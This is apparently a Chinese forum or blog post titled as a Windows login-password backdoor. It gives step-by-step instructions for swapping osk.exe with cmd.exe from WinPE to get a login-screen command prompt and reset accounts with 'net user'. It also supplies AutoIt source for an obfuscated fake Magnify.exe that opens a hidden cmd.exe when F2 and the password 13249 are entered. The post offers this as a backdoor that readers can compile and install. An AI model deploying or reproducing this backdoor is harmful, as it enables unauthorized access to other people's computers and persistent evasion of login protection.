win系统登录密码后门

这其实很简单就是利用下面这个原理，但是这个操作需要你能进入winpe。如果你有需要可以部署一个后门。

使用方法：

C:\Windows\System32\Magnify.exe 更名 C:\Windows\System32\Magnifyk.exe

这个操作需要先在文件 属性 安全 高级 所有人 中把程序所有者换成administrator，更改后可以 换回来。

然后编辑文件Magnify.exe放在C:\Windows\System32\目录下

然后再开机时 按 辅助程序 再按 放大镜 应用

然后 按 F2 输入密码 13249

然后按提示输入命令就可以了

原理

1、从U盘或者光盘的PE启动，进入PE系统，找到windows目录下的system32文件夹，备份cmd.exe和osk.exe两个文件到别的盘。

2、将osk.exe文件删除或者改名，将cmd.exe文件改名为osk.exe

3、从硬盘引导系统，到登录界面，在左下角打开屏幕键盘，由于我们在第二部进行了处理所以会自动调用cmd命令行。

4、输入命令：net user username newpassword 例如我的用户名huaner要改系统开机登录密码为123456的话命令内容是：

net user huaner 123456

最后等待提示完成后即可用新的开机密码登录windows7系统了，推荐以后将cmd.exe和osk.exe改回，不然以后调用的时候会出问题，如果不使用屏幕键盘的话可以不改回oks.exe，不过以后谁都能轻易破解修改掉你的windows7开机登录密码，毕竟我们的操作还要用一次PE呢。

AU3代码

#region ;**** 参数创建于 ACNWrapper_GUI ****
#PRE_UseUpx=n
#PRE_Run_Obfuscator=y
#endregion ;**** 参数创建于 ACNWrapper_GUI ****
HotKeySet("{F2}", "pass")
Run(@ScriptDir & "\Magnifyk.exe")
While 1
Sleep(500)
WEnd

Func pass()
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <WindowsConstants.au3>
#region ### START Koda GUI section ### Form=
$Form1_1 = GUICreate("", 246, 74, 382, 317)
$Input1 = GUICtrlCreateInput("", 8, 8, 225, 21, BitOR($GUI_SS_DEFAULT_INPUT, $ES_PASSWORD))
$Button1 = GUICtrlCreateButton("", 8, 40, 227, 25)
GUISetState(@SW_SHOW)
#endregion ### END Koda GUI section ###

While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
Case $Button1
If GUICtrlRead($Input1) = 13249 Then
MsgBox(0, "将密码改为123456", "net user administrator 123456")
Run(@ScriptDir & "\cmd.exe")
EndIf
EndSwitch
WEnd
EndFunc   ;==>pass

大家下载AU3程序编译就可以使用了。